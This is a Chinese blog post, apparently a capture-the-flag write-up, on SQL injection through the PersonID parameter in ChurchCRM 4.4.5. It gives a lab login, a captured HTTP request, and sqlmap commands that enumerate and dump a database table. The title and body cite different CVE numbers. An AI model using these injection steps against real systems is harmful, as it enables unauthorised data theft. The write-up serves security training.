CVE-2022-31325

news2024/11/25 14:39:03

文章目录

    • CVE-2022-30887
        • 一、漏洞介绍
        • 二、渗透步骤
          • 1、打开网站
          • 2、查找注入点
          • 3、截取数据包
          • 4、SQL注入
            • (1)、探测数据库
            • (2)、探测数据表
            • (3)、探测列名
            • (4)、查看flag值

CVE-2022-30887

一、漏洞介绍

ChurchCRM后台注入

ChurchCRM是一个为教会打造的开源 CRM 系统。

ChurchCRM 4.4.5版本存在安全漏洞,该漏洞源于/churchcrm/WhyCameEditor.php 中的“PersonID”字段存在安全问题。

二、渗透步骤

1、打开网站
http://eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com/session/begin
# 账号:admin
# 密码:123456

在这里插入图片描述

2、查找注入点
http://eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com/WhyCameEditor.php?PersonID=1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、截取数据包
POST /WhyCameEditor.php?PersonID=1&WhyCameID=&linkBack= HTTP/1.1
Host: eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: http://eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze8di7n1s8qcl3m64rl.cloudeci1.ichunqiu.com/WhyCameEditor.php?PersonID=1
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687499096,1687663463,1688006025,1688012314; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=bb80dc2c917de137e23a4ce817223d504c39fc4a; browse=CFlZTxUYU0BRVlFGVQJTRFBZSkdeQ1pYWVVFRl5RWERTU1xPX0dLThQ; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1688012314; CRM-40d1b2d83998fabacb726e5bc3d22129=6ibk4k788kbbee1oh19nqjf672
Upgrade-Insecure-Requests: 1

Join=test&Come=test&Suggest=test&HearOfUs=test&Submit=Save
4、SQL注入
(1)、探测数据库
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -p PersonID -dbs --batch 

在这里插入图片描述

(2)、探测数据表
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -p PersonID -D ctf --tables --batch 

在这里插入图片描述

(3)、探测列名
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -p PersonID -D ctf -T flag --columns --batch  

在这里插入图片描述

(4)、查看flag值
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -p PersonID -D ctf -T flag -C flag --dump --batch

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/701576.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Modbus协议在TCP/IP上的运用

文章目录 1 Modbus规约2 Modbus TCP/IP2.1 概要2.2 0x01读线圈2.3 0x03读保持寄存器2.4 0x05写单个寄存器2.5 0x06写单个寄存器2.6 0x10写多个寄存器 3 实例(ADU) 1 Modbus规约 Modbus规约是典型的一问一答的通信规约,支持多种电气接口&#…

android checkBox的使用

一、前言:之前工作中遇到的checkbox的使用是左边一个复选框,右边一个text。系统学完之后发现那样做的话有点别扭,还是中规中矩的舒坦。记录一下学习经过。 二、代码展示: 1.使用系统自带的checkbox插件。 创建一个CheckBoxActiv…

【Spring -02学习】

Spring 笔记记录 1. spring整合mybatis 注解开发2. spring整合junit3. IOC底层核心原理3.1 层次结构3.2 组件扫描器3.3 自定义导入器3.4 自定义注册器3.5 bean初始化过程解析 4.AOP配置4.1 AOP核心概念4.2 AOP入门案例4.2.1 XML方式4.2.2 注解方式 4. 3 切入点的三种形式4.4 五…

基于Python爬虫+K-means机器学习算法今日热点新闻推荐系统——热点推荐、热词呈现及个性化分析(含全部工程源码)

目录 前言总体设计系统整体结构图系统流程图 运行环境Python 环境Pycharm 环境相关库下载 模块实现1. 数据爬取2. 新闻处理与聚类3. 新闻推荐 系统测试1. 数据准备2. 文本聚类3. 热点新闻推荐 工程源代码下载其它资料下载 前言 本项目基于网络爬虫技术,用于爬取新闻…

01-创建项目-工具使用备忘录

创建项目 Keil5 (编写程序工具)生成输出hex文件 STC-ISP (下载程序辅助工具)辅助功能生成代码下载程序到单片机中运行 Keil5 (编写程序工具) 创建项目 创建好目录文件夹 选择对应芯片型号 不用自动生成启…

VMware虚拟机迁移到阿里云

1. 前言 最近公司内部研发部门有几台jenkins build机器运行在VMware平台上面,由于本地VMware平台底层计算资源不足导致虚拟机运行速度特别慢,每次版本发布都要build好久,而且VMware有时候计算资源不足,还会自动给占用资源大的机器…

nginx中的防盗链原理

一、什么是资源盗链 资源盗链是指内容不在自己服务器上,而通过技术手段,绕过别人的限制,将别人的内容,比如热门的图片放到自己页面上,展示给用户,以此来盗取别人网站的流量,即蹭流量。 简而言…

Mybatis【Map传参与模糊查询】

使用 Map 传参 当我们的实体类或者对应的数据库表的字段过多时,应当考虑使用Map! 我们之前通过对象传递参数来实现增改时,是通过传递对象做参数 来实现的: 我们在测试类中调用接口中的方法后,UserMapper.xml 会自动根…

阿里云短信发送接口实现

使用阿里云短信接口发送验证码 1. 引入依赖 springboot 工程引入web 引入 lombok 关键代码引入 <!--阿里云短信服务--> <dependency><groupId>com.aliyun</groupId><artifactId>dysmsapi20170525</artifactId><version>2.0.23<…

记录一次重装windows11没有WiFi驱动的排错错误示范

机器是自己组装的台式机&#xff1a; 查看主板的幸好&#xff0c;机箱我是没看懂&#xff0c;然后台式机 bios或者 msinfo32都可以查看 显示&#xff1a; 如下的页面进行查询&#xff1a; 下载 windows的驱动程序和工具包&#xff0c;结果显示华硕官网没有对应的驱动&#xf…

在线Markdown编辑器

一直在寻找一款好用的在线Markdown编辑器&#xff0c;但是好像没有比较知名的简洁的&#xff0c;寻思自己赶紧搞一个&#xff0c;于是找了项目&#xff0c;手动搞了一个上线了&#xff0c;效果不错&#xff0c;特性拉满。欢迎试用 支持“标准” Markdown / CommonMark 和 Gith…

点云可视化

pcl::visualization::CloudViewer 与 pcl::visualization::PCLVisualizer的区别 pcl::visualization::CloudViewer是一个简单的点云查看器类&#xff0c;提供了一个简单的接口来在窗口中显示点云数据。它可以快速地显示点云&#xff0c;并且只需要几行代码即可实现简单的点云查…

数据结构与算法:链表、树、图、堆、散列表

1 链表 链表是线性数据结构&#xff08;数据元素之间存在着“一对一”关系&#xff09;&#xff0c;链表中的每个元素是一个包含数据data和引用字段的对象&#xff0c;引用字段只有next为单向链表&#xff0c;同时又prev和next为双向链表。 1.1 链表基本操作 链表读取第 i 个…

java集合体系结构笔记

java集合的特点&#xff1a; 提供一种存储空间可变的存储模型&#xff0c;存储的数据容量可以随时发生改变。 单列数据&#xff1a; 双列数据&#xff1a; 单列数据集合存储实现接口Collection 双列数据集合存储实现接口Map 单列数据集合&#xff0c;数据值可重复存储实…

git杀手级功能 —— 分支管理

目录 分支介绍 创建分支 切换分支 和并分支 删除分支 合并冲突 分支管理策略 分支策略 bug分支 其他问题 强行删除临时分支 结语 分支介绍 在版本回退里发现&#xff1a;每次提交&#xff0c;git都会把它们穿成一条时间线&#xff0c;而这条时间线就可以理解为一个分支…

数据库监控与调优【十八】—— Percona Toolkit调优神器安装与使用

Percona Toolkit调优神器安装与使用 Percona Toolkit安装 本文基于Percona Toolkit 3.2.0&#xff0c;理论支持所有版本。 Percona Toolkit是一款MySQL世界里面非常实用的工具套件&#xff0c;如何安装它。 Windows系统 不支持。详见https://forums.percona.com/discussion/…

vue 一直运行 /sockjs-node/info?t=解决办法

sockjs-node介绍 sockjs-node 是一个JavaScript库&#xff0c;提供跨浏览器JavaScript的API&#xff0c;创建了一个低延迟、全双工的浏览器和web服务器之间通信通道。 服务端&#xff1a;sockjs-node&#xff08;https://github.com/sockjs/sockjs-node&#xff09;客户端&…

短视频抖音账号矩阵系统源码开发者自研(二)

一、短视频账号矩阵系统源码开发储存集群化开发运转更快 短视频账号矩阵系统源码开发采用储存集群化开发&#xff0c;可以显著提高系统的运转速度和效率。通过优化储存结构和算法&#xff0c;系统能够更快地处理短视频账号数据&#xff0c;确保用户能够流畅地浏览和观看短视频…

6.4 原子引用

1、什么是原子引用 原子引用以cas的方式实现控制多线程之前的同步&#xff0c;从而保证多线程的安全性 原子引用主要有以下三个类 AtomicReferenceAtomicStampReferenceAtomicMarkableReference 2、demo演示 Slf4j(topic "c.Test35") public class Test35 {pub…